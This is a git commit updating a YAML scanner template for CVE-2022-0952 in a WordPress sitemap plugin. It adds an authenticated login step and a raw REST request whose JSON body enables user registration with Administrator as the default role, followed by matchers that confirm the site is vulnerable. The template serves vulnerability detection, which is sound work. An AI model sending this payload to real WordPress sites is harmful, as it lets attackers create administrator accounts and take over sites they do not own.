Update CVE-2022-0952.yaml

2022-04-18 14:49:28 +04:00 · 2022-04-18 14:49:28 +04:00 · 8f90598790
parent 98b94ebde6
commit 8f90598790
1 changed files with 40 additions and 29 deletions
--- a/cves/2022/CVE-2022-0952.yaml
+++ b/cves/2022/CVE-2022-0952.yaml
@ -6,36 +6,47 @@ info:
  severity: critical
  description: The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin
  reference: https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b
-  tags: CVE-2022-0952,wordpress
+  tags: wordpress,cve,cve2022,authenticated,wp,wp-theme

 requests:
- raw:
-  - |-
-    POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
-    Host: {{Hostname}}
-    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
-    Accept: */*
-    Accept-Language: en-US,en;q=0.5
-    Accept-Encoding: gzip, deflate
-    Referer: {{BaseURL}}/wp-admin/admin.php?page=sitemap-by-click5%2Fsitemap-by-click5.php
-    Content-type: application/json;charset=UTF-8
-    Content-Length: 59
-    Origin: {{BaseURL}}
-    Connection: close
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check

-    {"users_can_register":"1","default_role":"Administrator"}
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
+        Accept: */*
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Referer: {{BaseURL}}/wp-admin/admin.php?page=sitemap-by-click5%2Fsitemap-by-click5.php
+        Content-type: application/json;charset=UTF-8
+        Content-Length: 59
+        Origin: {{BaseURL}}
+        Connection: close

-  matchers-condition: and
-  matchers:
-  - type: word
-    part: body
-    words:
-    - 'users_can_register'
-    - 'default_role'
-  - type: word
-    part: header
-    words:
-    - 'application/json'
-  - type: status
-    status:
-    - 200
+        {"users_can_register":"1","default_role":"Administrator"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "users_can_register"
+          - "default_role"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200